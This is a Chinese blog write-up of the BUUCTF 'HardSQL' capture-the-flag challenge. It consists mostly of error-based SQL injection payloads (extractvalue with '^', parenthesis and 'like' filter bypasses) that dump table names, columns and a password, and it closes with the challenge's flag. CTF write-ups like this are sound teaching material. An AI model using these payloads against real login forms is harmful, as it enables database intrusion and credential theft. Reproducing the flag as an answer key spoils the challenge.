0
点赞
收藏
分享

微信扫一扫

BUUCTF [极客大挑战 2019]HardSQL

独兜曲 2022-03-30 阅读 67

还是这个熟悉的登录页面

尝试万能密码登录,发现有过滤,一个一个试

过滤了空格,=,substr,and等等许多,双写也无法绕过,那么换报错注入试试

这里and用^绕过  空格用括号绕过 =用like绕过

用户名:1'^extractvalue(1,concat(0x7e,(select(database()))))#
密码随便输

1'^extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like'geek')))#

1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))#

1'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))#

 只有一半,用{left(),right()}

1'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))#
1'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))#

 拼起来得flag:flag{a23902dd-d567-42e5-b74f-d67bda971199}

举报

相关推荐

0 条评论